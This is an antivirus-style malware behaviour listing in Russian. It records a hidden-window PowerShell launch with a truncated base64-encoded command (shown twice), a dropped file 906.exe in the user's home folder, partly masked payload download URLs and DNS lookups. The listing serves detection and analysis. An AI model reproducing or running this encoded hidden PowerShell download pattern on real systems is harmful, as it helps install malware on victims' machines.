Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABOAGEAaAB4AGIAegB4AG0AbgBzAG0AYgA9ACcARwBiAG0AZABuAG0AZwBoAG4AJwA7ACQAUQBzAGgAaAB0AGwAbgBpAG0AYQBjACAAPQAgACcAOQAwADYAJwA7ACQASgBsAGwAeABpAHkAcwB2AGgAcAA9ACcAUwBiAHAAYgBkAGEAdgB...
- %HOMEPATH%\906.exe
- %HOMEPATH%\906.exe
- http://www.bl###ream.al/calendar/r83g9/
- http://my####thanhbinh.net/wp-content/uploads/qDq/
- http://www.mj####anical.com/wp-includes/ddy/
- DNS ASK bl###ream.al
- DNS ASK my####thanhbinh.net
- DNS ASK sf##c.biz
- DNS ASK co###print.net
- DNS ASK mj####anical.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABOAGEAaAB4AGIAegB4AG0AbgBzAG0AYgA9ACcARwBiAG0AZABuAG0AZwBoAG4AJwA7ACQAUQBzAGgAaAB0AGwAbgBpAG0AYQBjACAAPQAgACcAOQAwADYAJwA7ACQASgBsAGwAeABpAHkAcwB2AGgAcAA9ACcAUwBiAHAAYgBkAGEAdgB...' (со скрытым окном)